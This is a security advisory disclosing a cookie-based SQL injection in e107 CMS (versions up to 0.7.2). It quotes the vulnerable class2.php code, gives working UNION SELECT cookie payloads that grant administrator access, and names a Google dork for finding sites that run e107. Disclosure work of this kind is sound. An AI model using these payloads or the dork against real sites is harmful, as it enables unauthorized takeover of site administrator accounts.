SQL-Injection in e107 allows attacker to become a site admininstrator

Advisory Text :

Software: e107 (CMS)

Versions: <= 0.7.2

Type: SQL-injection

Homepage: www.e107.org

Description:

----------------------------

SQL-Injection in e107 allows attacker to become a site admininstrator.

Requirements:

----------------------------

Magic_quotes_gpc = Off

Vulnerability:

----------------------------

Vulnerability has been found in processing the COOKIE.

COOKIE use for authentification users and administrator.

Data transfered to this parameter not are filtered.

Code:

----------------------------

class2.php

.....

> list($uid, $upw)=($_COOKIE[$pref['cookie_name']] ? explode(".",
> $_COOKIE[$pref['cookie_name']]) : explode(".",
$_SESSION[$pref['cookie_name']]));

.....

> if($result = get_user_data($uid, "AND
md5(u.user_password)='{$upw}'", FALSE)) {

.....

Exploit:

0.6.xxx

1.blabla_hash_password' union select * from e107_user where user_id=1/*

0.7.X

1.blabla_hash_password' union select
1,'admin_d','admin',4,5,6,'some_user@some_hostcom',8,9,10,11,12,'1139995
361','1140005365',15,16,17,18,19,20,21,22,23,24,'1',26,27,'0',29,30,31,3
2,33 /*

Additional Information:

-----------------------

Google dorks: "Powered by e107"

Vendor Status

-------------

The vendor is informed!

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

SQL-Injection in e107 allows attacker to become a site admininstrator